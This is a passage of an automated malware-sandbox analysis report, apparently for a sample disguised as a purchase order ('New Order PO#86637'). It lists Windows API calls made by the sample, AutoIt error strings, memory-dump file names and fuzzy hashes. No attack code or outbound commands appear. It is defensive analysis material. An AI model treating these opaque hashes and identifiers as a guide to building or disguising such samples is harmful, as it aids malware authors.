                                                                            • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                            • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                            • PostMessageW.USER32(00000000), ref: 00441C05
                                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D